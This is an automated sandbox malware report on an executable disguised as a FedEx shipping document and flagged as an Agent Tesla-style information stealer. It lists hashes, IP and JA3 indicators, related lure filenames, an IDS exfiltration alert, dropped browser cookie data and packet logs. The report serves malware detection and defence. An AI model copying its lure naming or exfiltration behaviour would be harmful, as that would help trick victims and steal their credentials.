                                              Overall analysis duration:0h 9m 14s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:13
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample file name:FeDex_shipping_document.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@3/2@4/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 51
                                              • Number of non-executed functions: 3
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.10.249.147, 23.10.249.178, 93.184.221.240, 8.238.85.126, 8.241.126.121, 8.248.137.254, 67.26.75.254, 8.238.88.254
                                              • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, download.windowsupdate.com.edgesuite.net
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              11:51:45API Interceptor683x Sleep call for process: FeDex_shipping_document.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              162.159.138.232main.exeGet hashmaliciousDiscord Token StealerBrowse
                                                VCO00IddkzE1Fea.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                  PTT_PAKET#U0130N#U0130Z#U0130_TESL#U0130M_ED#U0130YOR.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                    SecuriteInfo.com.Trojan.GenericKD.65910484.24054.13087.exeGet hashmaliciousClipboard Hijacker, StealeriumBrowse
                                                      4wqRVHUtpe.exeGet hashmaliciousAgentTeslaBrowse
                                                        TNT_Express_874993766478.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                          DHL_STATEMENT_OF_ACCOUNT_-_1301671210.exeGet hashmaliciousAgentTeslaBrowse
                                                            Order_Requirement_6000025581-Pdf.com.exeGet hashmaliciousAgentTeslaBrowse
                                                              Stub.exeGet hashmaliciousVector StealerBrowse
                                                                IKOqEiHbs8.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                  e0fNE6JwJu.exeGet hashmaliciousAgentTeslaBrowse
                                                                    New_quotation_20230203.exeGet hashmaliciousAgentTeslaBrowse
                                                                      PiAM13RZow.exeGet hashmaliciousAgentTeslaBrowse
                                                                        Awb#_8457108962.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                          T0jjggfcjh.exeGet hashmaliciousAgentTeslaBrowse
                                                                            DHL_Receipt_AWB#200458029822.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Vanta Installer.exeGet hashmaliciousCreal StealerBrowse
                                                                                DHL Express_ AWB#201045829822.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  e-dekont-20230228.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    e-dekont-20230228.exeGet hashmaliciousAgentTeslaBrowse

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      discord.comPDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                      • 162.159.136.232
                                                                                      main.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                      • 162.159.138.232
                                                                                      VCO00IddkzE1Fea.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                      • 162.159.137.232
                                                                                      Qhxujqkxtf.exeGet hashmaliciousUnknownBrowse
                                                                                      • 162.159.137.232
                                                                                      e-dekont-20230316B.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.135.232
                                                                                      3_Hire_Invoice_CP_March_15_2023_pdf.exeGet hashmaliciousVector Stealer, zgRATBrowse
                                                                                      • 162.159.128.233
                                                                                      PTT_PAKET#U0130N#U0130Z#U0130_TESL#U0130M_ED#U0130YOR.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                      • 162.159.136.232
                                                                                      SecuriteInfo.com.Trojan.GenericKD.65910484.24054.13087.exeGet hashmaliciousClipboard Hijacker, StealeriumBrowse
                                                                                      • 162.159.135.232
                                                                                      DOC-20230315=567890987655606.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.135.232
                                                                                      DISCHARGING 42,000 MT CLINKER IN BULK.PDF.jsGet hashmaliciousVector StealerBrowse
                                                                                      • 162.159.136.232
                                                                                      choo.exeGet hashmaliciousVector StealerBrowse
                                                                                      • 162.159.136.232
                                                                                      MV_GREAT_SEA_II.jsGet hashmaliciousVector StealerBrowse
                                                                                      • 162.159.128.233
                                                                                      Quotation_10072017.pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                      • 162.159.128.233
                                                                                      FedEx_Invoice-XXXXX4210-02032023073135894221.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.137.232
                                                                                      Para_Transferi_Bilgilendirmesi1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.136.232
                                                                                      c0PZAXHMCpdh5F1.exeGet hashmaliciousClipboard Hijacker, Redline Clipper, StealeriumBrowse
                                                                                      • 162.159.135.232
                                                                                      4wqRVHUtpe.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.137.232
                                                                                      Para_Transferi_Bilgilendirmesi000.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.135.232
                                                                                      TNT_Express_874993766478.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                      • 162.159.138.232
                                                                                      gunzipped.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.136.232

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CLOUDFLARENETUSDHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • 1.13.186.125
                                                                                      DHL.com.exeGet hashmaliciousStealc, VidarBrowse
                                                                                      • 162.159.133.233
                                                                                      Leeds_V10185807.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.24.14
                                                                                      Weekly CashFlow WC 20 Mar 2023.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.24.14
                                                                                      Colt Technology Services 401K Increased Contribution Statement Payments.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.25.14
                                                                                      PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                      • 162.159.136.232
                                                                                      SC.028UCCP.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • 104.21.39.114
                                                                                      #U8be2#U4ef7.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.67.145.161
                                                                                      https://lp.constantcontactpages.com/cu/YWZoQqoGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.25.14
                                                                                      http://awfonts.comGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.220.229
                                                                                      http://vovysjdjs763f3ba539c0dd.opticair.ruGet hashmaliciousUnknownBrowse
                                                                                      • 104.16.123.96
                                                                                      https://lp.constantcontactpages.com/cu/YWZoQqoGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.25.14
                                                                                      https://ipfs.io/ipfs/bafybeieqwjihauwgqt7xc6em5fjahc6wprftgeacb4ba3nfn6hk5c5lgky/chenjeffente_cham_ev14.html#for.transition.support@casa.gov.auGet hashmaliciousUnknownBrowse
                                                                                      • 104.17.25.14
                                                                                      https://jtouch.co.ke/Get hashmaliciousUnknownBrowse
                                                                                      • 188.114.96.3
                                                                                      http://sengsipnem.web.app/yuxuba-%E6%8A%98%E3%82%8A%E7%B4%99-%E3%83%90%E3%83%83%E3%82%BF-%E6%8A%98%E3%82%8A%E6%96%B9.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.72.125
                                                                                      oXMenI45tQ.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.67.156.58
                                                                                      https://rheba218.softr.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.18.6.185
                                                                                      http://oceanhero.ccGet hashmaliciousUnknownBrowse
                                                                                      • 188.114.96.3
                                                                                      OYm3R777Yb.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, Raccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                                                                      • 188.114.96.3
                                                                                      gbK76vpcp8.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                                                      • 188.114.96.3

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      3b5074b1b5d032e5620f69f9f700ff0eDHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      bgfbv.exeGet hashmaliciousXmrigBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      setup.exeGet hashmaliciousXmrigBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      0E0BD47371B5E50FC51F147DC456949F8DB70EC27B644.exeGet hashmaliciousRedLineBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      setup.exeGet hashmaliciousXmrigBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155
                                                                                      315B63093AE9218EBDEAEB5120E17D7FA81BC7BAE694F.exeGet hashmaliciousRedLineBrowse
                                                                                      • 162.159.138.232
                                                                                      • 64.185.227.155

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FeDex_shipping_document.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.355304211458859
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                      Malicious:true
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                      C:\Users\user\AppData\Roaming\ghkgpqzj.zir\Chrome\Default\Network\Cookies

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):0.4393511334109407
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                      MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                      SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                      SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                      SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.864054907684923
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:FeDex_shipping_document.exe
                                                                                      File size:746496
                                                                                      MD5:5cf87a160007a5e6c7a4d24e1d831327
                                                                                      SHA1:e11d7467bc961d5ff16c3541200be1ad5083cefa
                                                                                      SHA256:91e74ee16f6229b18ef4f973494b8ec68bad3420e90fd3f1ee6d835048421fcf
                                                                                      SHA512:c11e2c571817ac519ef89019529171d64e9f3faa17a2ccd51a55770113eff83e27f3a53133cec3daa096f989fafedd378e759cc4030b83489ebccbd7aa425237
                                                                                      SSDEEP:12288:EDBmYMUnFW/NMbbjHAaBvaDzGkSjT+vbuxiZQ7GiPLbk6jdoVx2ye6yb:EDBUibAXPGD+zKiri/kCGVYye6q
                                                                                      TLSH:66F402342FEA6239F57657BDD9E43295236E77B22703D95E04B121CA4B63B028DC092F
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d..............0..N..........Rm... ........@.. ....................................@................................

                                                                                      File Icon

                                                                                      Icon Hash:209480e66eb84902

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x4b6d52
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6417BCAC [Mon Mar 20 01:53:48 2023 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb6cfd0x4f.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x1110.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb58e80x54.text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000xb4d580xb4e00False0.9268084290774016data7.872797130775443IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0xb80000x11100x1200False0.73046875data6.631473125860904IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0xba0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_ICON0xb81000xa79PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                      RT_GROUP_ICON0xb8b8c0x14data
                                                                                      RT_VERSION0xb8bb00x360data
                                                                                      RT_MANIFEST0xb8f200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                      Imports

                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      192.168.2.7162.159.138.232497014432851779 03/20/23-11:52:05.074477TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49701443192.168.2.7162.159.138.232

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Mar 20, 2023 11:51:49.157324076 CET49700443192.168.2.764.185.227.155
                                                                                      Mar 20, 2023 11:51:49.157382011 CET4434970064.185.227.155192.168.2.7
                                                                                      Mar 20, 2023 11:51:49.157479048 CET49700443192.168.2.764.185.227.155
                                                                                      Mar 20, 2023 11:51:49.196374893 CET49700443192.168.2.764.185.227.155
                                                                                      Mar 20, 2023 11:51:49.196409941 CET4434970064.185.227.155192.168.2.7
                                                                                      Mar 20, 2023 11:51:57.077124119 CET4434970064.185.227.155192.168.2.7
                                                                                      Mar 20, 2023 11:51:57.077359915 CET49700443192.168.2.764.185.227.155
                                                                                      Mar 20, 2023 11:51:57.808013916 CET49700443192.168.2.764.185.227.155
                                                                                      Mar 20, 2023 11:51:57.808080912 CET4434970064.185.227.155192.168.2.7
                                                                                      Mar 20, 2023 11:51:57.808967113 CET4434970064.185.227.155192.168.2.7
                                                                                      Mar 20, 2023 11:51:57.874470949 CET49700443192.168.2.764.185.227.155
                                                                                      Mar 20, 2023 11:51:58.269769907 CET49700443192.168.2.764.185.227.155
                                                                                      Mar 20, 2023 11:51:58.269812107 CET4434970064.185.227.155192.168.2.7
                                                                                      Mar 20, 2023 11:51:59.014796972 CET49700443192.168.2.764.185.227.155
                                                                                      Mar 20, 2023 11:51:59.014924049 CET4434970064.185.227.155192.168.2.7
                                                                                      Mar 20, 2023 11:51:59.014995098 CET49700443192.168.2.764.185.227.155
                                                                                      Mar 20, 2023 11:52:04.950087070 CET49701443192.168.2.7162.159.138.232
                                                                                      Mar 20, 2023 11:52:04.950215101 CET44349701162.159.138.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:04.950337887 CET49701443192.168.2.7162.159.138.232
                                                                                      Mar 20, 2023 11:52:04.952203989 CET49701443192.168.2.7162.159.138.232
                                                                                      Mar 20, 2023 11:52:04.952301979 CET44349701162.159.138.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:05.009949923 CET44349701162.159.138.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:05.010083914 CET49701443192.168.2.7162.159.138.232
                                                                                      Mar 20, 2023 11:52:05.014666080 CET49701443192.168.2.7162.159.138.232
                                                                                      Mar 20, 2023 11:52:05.014695883 CET44349701162.159.138.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:05.015054941 CET44349701162.159.138.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:05.018209934 CET49701443192.168.2.7162.159.138.232
                                                                                      Mar 20, 2023 11:52:05.018237114 CET44349701162.159.138.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:05.073689938 CET44349701162.159.138.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:05.074287891 CET49701443192.168.2.7162.159.138.232
                                                                                      Mar 20, 2023 11:52:05.074341059 CET44349701162.159.138.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:05.421833992 CET44349701162.159.138.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:05.422219038 CET44349701162.159.138.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:05.422296047 CET49701443192.168.2.7162.159.138.232
                                                                                      Mar 20, 2023 11:52:05.424500942 CET49701443192.168.2.7162.159.138.232
                                                                                      Mar 20, 2023 11:52:06.002155066 CET49702443192.168.2.7162.159.135.232
                                                                                      Mar 20, 2023 11:52:06.002207994 CET44349702162.159.135.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:06.002302885 CET49702443192.168.2.7162.159.135.232
                                                                                      Mar 20, 2023 11:52:06.003519058 CET49702443192.168.2.7162.159.135.232
                                                                                      Mar 20, 2023 11:52:06.003566027 CET44349702162.159.135.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:06.051467896 CET44349702162.159.135.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:06.055735111 CET49702443192.168.2.7162.159.135.232
                                                                                      Mar 20, 2023 11:52:06.055769920 CET44349702162.159.135.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:06.124003887 CET44349702162.159.135.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:06.124957085 CET49702443192.168.2.7162.159.135.232
                                                                                      Mar 20, 2023 11:52:06.125015020 CET44349702162.159.135.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:06.437938929 CET44349702162.159.135.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:06.438318968 CET44349702162.159.135.232192.168.2.7
                                                                                      Mar 20, 2023 11:52:06.438410997 CET49702443192.168.2.7162.159.135.232
